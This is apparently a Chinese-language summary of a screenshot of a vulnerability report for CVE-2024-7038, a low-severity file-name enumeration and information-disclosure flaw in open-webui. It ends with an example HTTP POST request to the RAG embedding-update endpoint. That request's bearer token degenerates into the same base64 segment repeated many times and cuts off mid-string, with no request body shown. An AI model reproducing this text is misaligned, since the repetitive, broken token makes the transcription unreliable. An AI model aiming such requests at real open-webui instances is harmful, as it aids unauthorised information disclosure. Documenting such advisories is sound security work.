从这个网页截图中,可以获取到以下关于漏洞的关键信息: 1. 漏洞描述: - 标题:File Name enumeration leads to information disclosure in open-webui/open-webui - 报告日期:2024年7月12日 - 状态:已验证 2. 漏洞类型: - CVE编号:CVE-2024-7038 - 类型:CWE-200: Exposure of Sensitive Information to an Unauthorized Actor 3. 漏洞严重性: - 等级:低(2.7) 4. 漏洞利用: - 请求示例: ``` POST /rag/api/v1/embedding/update HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: / Accept-Language: en-US, en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost:8080/admin/settings/ Content-Type: application/json Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1MjM5NjU1NnwiZXhwIjoxNjUxMjU1NjU1fQ.eyJpZCI6IjQ5YjE1OTM4LWYzMzAtNGY0NiIsImlhdCI6MTY1Mj